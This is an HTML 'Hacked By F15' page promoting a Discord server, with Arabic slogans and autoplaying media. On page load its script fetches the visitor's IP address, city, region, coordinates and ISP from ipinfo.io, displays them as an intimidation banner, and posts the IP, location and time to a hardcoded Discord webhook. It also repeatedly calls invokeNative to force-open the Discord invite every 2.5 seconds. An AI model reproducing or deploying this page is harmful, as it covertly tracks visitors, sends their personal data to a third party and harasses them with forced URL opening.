<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/F15</title>
    <style>
       body {
            margin: 0;
            padding: 0;
            background: black;
            font-family: 'Courier New', Courier, monospace;
            color: #9f8663;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
            overflow: hidden;
        }
        #content {
            display: none;
            opacity: 0;
            transition: opacity 2s ease;
        }
        .image-container img {
            width: 400px; 
            height: auto;
            border: 2px solid #a60404; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(255, 0, 0, 0.7); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color:  #a60404; 
            text-shadow: 0 0 8px #a60404, 0 0 15px #a60404, 0 0 25px #a60404;
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 5px;
            font-size: 75px; 
            color: #a60404; 
            text-shadow: 0 0 8px #a60404, 0 0 15px #a60404, 0 0 25px #a60404; 
            letter-spacing: 4.5px;
        }
        .video-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
            z-index: -1;
        }
        .video-container video {
            width: 100%;
            height: 100%;
            object-fit: cover;
            filter: blur(15px);
        }
    </style>
</head>
<body>
    <div class="video-container">
        <video autoplay loop muted>
            <source src="https://a.top4top.io/m_335784iql1.mov" type="video/mp4">
            Your browser does not support the video tag.
        </video>
    </div>

    <div class="gif-container">
        <img src="https://media.discordapp.net/attachments/1289801332240154724/1345959471423426571/v14044g50000ctbds5fog65jkbs0ro80_1.gif?width=748&height=264" alt="">
    </div>

    <div id="content">
        <div class="image-container">
            <img src="https://media.discordapp.net/attachments/1289801332240154724/1345959471423426571/v14044g50000ctbds5fog65jkbs0ro80_1.gif?width=748&height=264" alt="">
        </div>

        <audio autoplay loop>
            <source src="https://cdn.discordapp.com/attachments/1306412762863370301/1348871479844012082/SongPeel-ReverbAdder-Output_3.wav?ex=67d109f5&is=67cfb875&hm=9c7dc8061a8277e57f20f8d79da329e176271f05a45e290e5897e8b2926a74e6&">
            Your browser does not support the audio element.
        </audio>

        <div class="info" id="ip-info"></div>
        <div class="text">discord.gg/F15</div>
        <div class="text" style="font-size: 50px;">بعيوني حلا eue  بعيوني الحروب </div>
    </div>

    <script>
        setTimeout(() => {
            document.querySelector('.gif-container').style.display = 'none';
            const content = document.getElementById('content');
            content.style.display = 'block';
            setTimeout(() => {
                content.style.opacity = 1;
            }, 150); 
        }, 200);

        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            const { ip, country, city, region, loc, org, timezone } = data;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.innerHTML = ` << Hacked By F15 >>
<strong>IP:</strong><span>"${ip}"</span><br><strong>City:</strong><span>"${city}"</span><br><strong>Region:</strong><span>"${region}"</span><br><strong>Country:</strong><span>"${country}"</span><br><strong>Location:</strong><span>"${loc}"</span><br><strong></strong> <span>"${org}"</span><br><strong>Timezone:</strong><span>"${timezone}"</span>`;

            const dateTime = new Date().toLocaleString();
            const webhookUrl = 'https://canary.discord.com/api/webhooks/1301722728541458472/OJrlM-B2yioPp9q5o1oMjRMugMJhRBXLh7DMQoaIbrGVPU9hDl_exKk4PMusgXRA3h6b';
            fetch(webhookUrl, {
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify({content: `IP : ${ip}\nCountry & City : ${country} - ${city}\nDate & Time : ${dateTime}\n -`})
            });
        });

        setInterval(function() {
            window.invokeNative("openUrl", "https://discord.gg/F15");
            window.invokeNative("openUrl", "https://discord.gg/F15");
        }, 2500);
    </script>
</body>
</html>
